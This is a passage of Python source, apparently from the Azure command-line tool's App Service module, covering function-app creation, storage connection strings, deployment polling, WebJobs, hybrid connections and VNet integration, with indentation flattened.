if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, runtime_version=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the OS type defaults to Windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime].keys()
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {}. '
'Supported versions are: {}'
.format(runtime_version, runtime, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if is_consumption:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in RUNTIME_TO_IMAGE_FUNCTIONAPP.keys():
raise CLIError("An appropriate linux image for runtime:'{}' was not found".format(runtime))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(is_consumption, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# add the app settings that make the site a function app
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_linux_fx_functionapp(is_consumption, runtime, runtime_version):
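# Illustrative sketch (image-map values assumed): on a consumption plan, runtime='python' with
# runtime_version '3.6' yields 'PYTHON|3.6'; on dedicated or Elastic Premium plans the value comes
# from RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime][runtime_version] formatted by _format_fx_version,
# e.g. a 'DOCKER|<image>' style string.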
if runtime_version is None:
runtime_version = RUNTIME_TO_DEFAULT_VERSION[runtime]
if is_consumption:
return '{}|{}'.format(runtime.upper(), runtime_version)
# App service or Elastic Premium
return _format_fx_version(RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime][runtime_version])
def _get_website_node_version_functionapp(runtime, runtime_version):
if runtime is None or runtime != 'node':
return NODE_VERSION_DEFAULT_FUNCTIONAPP
if runtime_version is not None:
return '~{}'.format(runtime_version)
return NODE_VERSION_DEFAULT_FUNCTIONAPP
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# Emit this success message as a warning so it does not interfere with the regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
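# Illustrative example (account name assumed): on the public cloud this produces
# 'DefaultEndpointsProtocol=https;EndpointSuffix=core.windows.net;AccountName=mystorage;AccountKey=<key0>'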
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
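# Illustrative note (status codes per the checks below): the deployment status endpoint reports
# status 3 for a failed deployment and 4 for success; with timeout unset this polls up to 450
# times, sleeping twice per attempt.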
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
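# Illustrative example (URI shape assumed): an ARM URI like
# '/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Relay/namespaces/<ns>/hybridConnections/<hc>'
# splits after 'resourceGroups/' so relay_resource_group becomes '<rg>'.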
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# ensure the input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformat the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnet_id = ''
for v in list_all_vnets:
if v.name == vnet:
vnet_id = v.id
# parsing the arm uri in order to extract vnet_name and vnet_resource_group
vnet_id_strings = vnet_id.split('/')
vnet_resource_group = ''
i = 0
for z in vnet_id_strings:
if z.lower() == "resourcegroups":
vnet_resource_group = vnet_id_strings[i + 1]
i = i + 1
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
subnet_parameters=subnetObj)
id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
subnet_resource_id = id_subnet.id
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements,
launch_browser=False):
import os
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_create_new_app = does_app_already_exist(cmd, name)
os_name = detect_os_form_src(src_dir)
lang_details = get_lang_from_content(src_dir)
language = lang_details.get('language')
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of "
"the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please "
"re-run command with the correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(rg_name, plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to "
"'{}'. "
"Please create a new app to continue this operation.".format(name, current_os, src_dir, os))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("webapp %s doesn't exist", name)
sku = get_sku_to_use(src_dir, sku)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name)
_is_linux = os_name.lower() == 'linux'
_create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux)
plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
